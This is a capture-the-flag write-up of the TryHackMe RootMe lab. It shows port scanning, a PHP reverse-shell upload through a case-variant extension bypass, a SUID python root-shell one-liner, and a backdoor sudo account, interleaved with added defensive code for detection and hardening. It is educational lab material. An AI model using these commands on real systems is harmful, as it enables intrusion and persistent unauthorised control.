Hello guys, this blog post is about cyber security. While walking you through my RootMe CTF (Capture the Flag) experience on TryHackMe, I'll also show you how an insecure server gets hacked through web vulnerabilities.
I'll be using the Kali Linux operating system, which ships with the most important pentest tools and is built specifically for cyber security and hacking work. In this blog post I'll show you several methods using various tools in Kali. If you've seen the dragon above before, you probably already know Kali. :)
TryHackMe is a web site that offers virtual lab environments for people who want to learn and improve in cyber security. Let me remind you that it's a useful site and that you shouldn't use what you learn about hacking for bad intentions in real life.
You can reach the CTF at this link: https://tryhackme.com/room/rrootme.
Now let's set up the lab environment. Go to the CTF and open Task 1. Click "Start Machine" to start the machine we're going to hack.
As you can see, once the machine is ready it gives us its IP address.
With the machine ready, we need to connect to the VPN. To do that, click the button with the question mark and follow the "See Instructions" steps shown in the image; I won't go through those steps here.
After completing the steps, you need to download the .ovpn file that is unique to you. Connect to the VPN network with this file.
# openvpn <YOUR_FILE>.ovpn
Those who want to try the CTF on their own may stop reading here, since I've already solved it and you'll see the answers below.
Once connected to the VPN, we can move on to Task 2. The purpose of Task 2 is reconnaissance: we're expected to start by scanning the open ports of the server, of which we only know the IP so far.
Go to the terminal and ping the target server. Since we get replies, we can communicate with the target; if the VPN connection had failed, we wouldn't see any replies. To scan the open ports we'll use the Nmap tool; its -F option quickly scans the most common ports. The scan shows that ports 22 (SSH) and 80 (HTTP) are open.
# ping <HEDEF_IP>
# nmap <HEDEF_IP> -F
Seeing that the HTTP port is open, we enter the IP address in the browser, assuming it's a web application server. After a rather meaningful welcome on the index page, we go back to the terminal.
For more information about the server, send an HTTP HEAD request to the web page (HEAD is the command-line client from the libwww-perl package; curl -I does the same). Note that the target server runs Ubuntu with Apache version 2.4.29.
# HEAD http://<HEDEF_IP>/
Now we'll scan for hidden pages of the web site. Install the Gobuster tool for this. Gobuster brute-forces hidden pages and sub-directories of a web site using a given wordlist. You can see the tool's options with the "gobuster -h" command.
# apt-get install gobuster
# gobuster -h
Google around to find a useful wordlist for Gobuster.
I've found a useful wordlist. Keep in mind that the longer the wordlist, the longer the scan takes; on the other hand, the shorter the wordlist, the more hidden pages you may overlook.
# git clone https://github.com/aels/subdirectories-discover
# cd subdirectories-discover
Gobuster found all the hidden pages by going through the wordlist, about 15 seconds after the scan started. The panel and uploads pages are especially important here.
# gobuster dir -u http://<HEDEF_IP> -w dsstorewordlist.txt
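From the server's side, a wordlist scan like the one above is a burst of requests from one client where almost every path answers 404. The following is an added example (not from the post or from Gobuster) that flags such clients in Apache access logs; the log lines are constructed and the client addresses are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format: client, timestamp, request line, status, size, referer, agent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$')
# Constructed sample (not from the page's target): one ordinary visitor, then a burst of
# requests from a second client where most paths do not exist, the server-side view of a scan.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /backup HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /panel HTTP/1.1" 301 310 "-" "gobuster/3.1.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /test HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /uploads HTTP/1.1" 301 312 "-" "gobuster/3.1.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /old HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
"""

def parse_line(line):
    """Return a dict with ip, ts (aware datetime), path, status; None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["status"] = int(d["status"])
    return d

def find_scanners(log_text, window_seconds=10, min_404=4):
    """Map ip -> (peak 404s inside any sliding window, paths that answered non-404)
    for clients whose 404 density looks like wordlist brute-forcing."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)
    flagged = {}
    for ip, recs in per_ip.items():
        misses = sorted(r["ts"] for r in recs if r["status"] == 404)
        peak, start = 0, 0
        for end in range(len(misses)):
            while (misses[end] - misses[start]).total_seconds() > window_seconds:
                start += 1  # shrink the window from the left until it fits
            peak = max(peak, end - start + 1)
        if peak >= min_404:
            # Non-404 answers are what the scanner actually discovered; triage those first.
            flagged[ip] = (peak, sorted({r["path"] for r in recs if r["status"] != 404}))
    return flagged
```

The paths reported alongside the count are the ones the scanner actually discovered, which is where a defender should look first.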
It seems the panel page is an interface for users to upload files to the site. If we can upload a malicious file to the site through this interface, we can hack it.
And the uploads page is probably designed to view the uploaded files.
All the questions of Task 2 on the CTF page are completed. Now we'll handle Task 3.
We are asked to read the "user.txt" file by getting a shell on the server. What's important here is the "file upload bypass" method, that is, uploading the malicious file to the web site in some way. The other piece is the "PHP reverse shell": a PHP payload that makes the target server open a TCP connection back to us and hands us a shell over it.
Google "PHP reverse shell". We find an open-source script for it.
After downloading the source, open the PHP file to edit the code.
# git clone https://github.com/pentestmonkey/php-reverse-shell
# cd php-reverse-shell
# vi php-reverse-shell.php
We see the IP and port variables we're asked to change. The purpose of the attack is to direct the shell on the target server back to our machine, so we enter our own IP in the IP variable and an unused port on our machine in the port variable.
Let's try to upload the malicious PHP file to the site.
We get an error message in Portuguese: uploading files with the PHP extension is not allowed. It's obvious that the developers have strict security measures.
Now we should look up "file upload bypass" methods.
I've tried various methods to bypass this upload check; you can research those methods on your own. I tried uploading the file with different extensions such as pHP, phP, Php, php5 and pHP5, and saw the error message many times. In a second terminal I ran the nc command to listen on the port I had given to the script. That way, if the upload succeeds and we run the script, we'll catch the shell that connects back to this port.
# nc -nvlp <YOUR_PORT>
Finally, one of my attempts succeeded: the file with the .pHP5 extension was uploaded to the site. Go to the uploads page.
The uploaded file appears on the uploads page; click the .pHP5 file to run the code.
That's it! As you can see in the right-hand terminal, we've caught a shell on the target server. Check who we are and what we can do on the server with a few basic commands.
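Why did .pHP5 get through? A blacklist that compares extensions case-sensitively lets a differently-cased variant past. The block below is an added example (not the site's actual filter and not from the post): a check with that weak shape next to a hardened one that allowlists lower-cased extensions, rejects double extensions, and stores uploads under a server-chosen name. The filenames are constructed.

```python
import hashlib
import os
import re

# Constructed filenames: the exact case/extension variants tried in the post.
TRIED = ["shell.php", "shell.pHP", "shell.phP", "shell.Php", "shell.php5", "shell.pHP5"]
ALLOWED = {"png", "jpg", "jpeg", "gif"}

def weak_is_allowed(filename):
    """Case-sensitive blacklist: the shape of check that lets "shell.pHP5" through."""
    blocked = {".php", ".php5", ".phtml"}
    return not any(filename.endswith(ext) for ext in blocked)

def strict_is_allowed(filename):
    """Allowlist on every extension, lower-cased, with a conservative character set."""
    name = os.path.basename(filename)
    if not re.fullmatch(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)+", name):
        return False
    parts = name.lower().split(".")
    # Every extension must be allowed: "shell.php.png" is rejected even though it ends in
    # .png, because Apache's mod_mime can still pick a handler from an earlier extension.
    return all(p in ALLOWED for p in parts[1:])

def safe_stored_name(filename, blob):
    """Ignore the client-supplied name; store under a content hash plus the checked extension."""
    if not strict_is_allowed(filename):
        raise ValueError("rejected upload: " + filename)
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return hashlib.sha256(blob).hexdigest()[:16] + "." + ext
```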
$ whoami
$ id
$ ls -l
Try to find and read user.txt to capture the flag for Task 3.
$ find / -name user.txt 2>/dev/null
$ cat /var/www/user.txt
We now have a shell on the server, but since we don't have sudo rights we still can't do much. Let's move on to Task 4, the last part. Our goal is to gain sudo rights, that is, to become root. The purpose of this task is "privilege escalation".
The first thing to do on the compromised server is to look for files with the SUID special permission. Run the find command on both our own machine and the target to compare the files owned by root that have the SUID bit set. The python binary is the important one here: it means any user who runs python on this server does so with root's privileges.
$ find / -user root -perm /4000 2>/dev/null
The key word here is "GTFOBins". GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
With the help of GTFOBins we've found the python command we need.
Using the misconfigured SUID python binary, we've obtained a root shell on the target server that we originally compromised as the www-data user. The last flag is captured and we now fully control this server.
$ which python
$ python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami
# find / -name root.txt 2>/dev/null
# cat /root/root.txt
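The defender's counterpart of the SUID hunt above is a periodic audit that lists SUID-root files and flags interpreters among them, since an interpreter with that bit is a root shell for every local user. This is an added example, not from the post or from GTFOBins; the sample entries are constructed to resemble the find output, and the live walker only reads file metadata.

```python
import os
import stat

# Interpreters and editors that hand the caller an interactive shell; owned by root with the
# SUID bit set, each is a direct root shell for any local user (the python case in the post).
SHELL_CAPABLE = {"python", "perl", "ruby", "bash", "sh", "vim"}

def is_suid_root(mode, uid):
    """True for a regular file owned by uid 0 that carries the set-user-ID bit."""
    return uid == 0 and bool(mode & stat.S_ISUID) and stat.S_ISREG(mode)

def classify(entries):
    """entries: iterable of (path, mode, uid). Returns (all SUID-root paths, the risky subset)."""
    suid_root = [p for p, m, u in entries if is_suid_root(m, u)]
    def base(p):
        # Strip version suffixes such as python3.8 so the name matches the set above.
        n = os.path.basename(p)
        return n.rstrip("0123456789.") or n
    risky = [p for p in suid_root if base(p) in SHELL_CAPABLE]
    return suid_root, risky

def walk_filesystem(root="/"):
    """Live audit: lstat every file under root (unreadable entries skipped), then classify."""
    found = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            p = os.path.join(dirpath, f)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            found.append((p, st.st_mode, st.st_uid))
    return classify(found)

# Constructed sample resembling the find output in the post (modes as octal integers).
SAMPLE = [
    ("/usr/bin/passwd", 0o104755, 0),      # expected SUID root: it must write /etc/shadow
    ("/usr/bin/sudo", 0o104755, 0),
    ("/usr/bin/python", 0o104755, 0),      # misconfiguration: SUID root interpreter
    ("/usr/bin/python3.8", 0o100755, 0),   # normal: no SUID bit
    ("/home/user/tool", 0o104755, 1000),   # SUID but not root-owned: not a root escalation
]
```

Running walk_filesystem() on a real host and diffing the result against a known-good baseline catches a newly set SUID bit the same way the scan in the post found it.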
The CTF is finished at this point. However, there is one more manipulation, called a backdoor. Create a new user and grant it sudo rights. Then we can connect directly from our machine to the target over SSH and have sudo.
# useradd system
# passwd system
# usermod -aG sudo system
# ssh system@<HEDEF_IP>
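The backdoor above leaves two traces on disk: a new line in /etc/passwd and a new member in the sudo group in /etc/group. Here is an added example (not from the post) of the host-integrity check that would catch it by diffing snapshots of those files; the before/after contents are constructed.

```python
# Constructed before/after snapshots of the two files a "new sudo user" backdoor modifies.
PASSWD_BEFORE = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
"""
PASSWD_AFTER = PASSWD_BEFORE + "system:x:1001:1001::/home/system:/bin/sh\n"
GROUP_BEFORE = "root:x:0:\nsudo:x:27:ubuntu\nwww-data:x:33:\n"
GROUP_AFTER = "root:x:0:\nsudo:x:27:ubuntu,system\nwww-data:x:33:\n"

def parse_passwd(text):
    """name -> (uid, shell) for each well-formed passwd line."""
    out = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) == 7:
            out[f[0]] = (int(f[2]), f[6])
    return out

def parse_group(text):
    """group name -> set of supplementary members."""
    out = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) == 4:
            out[f[0]] = {m for m in f[3].split(",") if m}
    return out

def diff_accounts(passwd_old, passwd_new, group_old, group_new,
                  admin_groups=("sudo", "wheel", "admin")):
    """Findings worth alerting on: new accounts, uid-0 accounts other than root,
    and new members of administrative groups."""
    po, pn = parse_passwd(passwd_old), parse_passwd(passwd_new)
    go, gn = parse_group(group_old), parse_group(group_new)
    findings = []
    for name, (uid, shell) in pn.items():
        if name not in po:
            findings.append(f"new account {name} (uid {uid}, shell {shell})")
        if uid == 0 and name != "root":
            findings.append(f"uid 0 account {name}")
    for g in admin_groups:
        for m in sorted(gn.get(g, set()) - go.get(g, set())):
            findings.append(f"{m} added to {g}")
    return findings
```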
That's the final touch, and my blog post ends here.
Hope to see you in new posts,
Take care.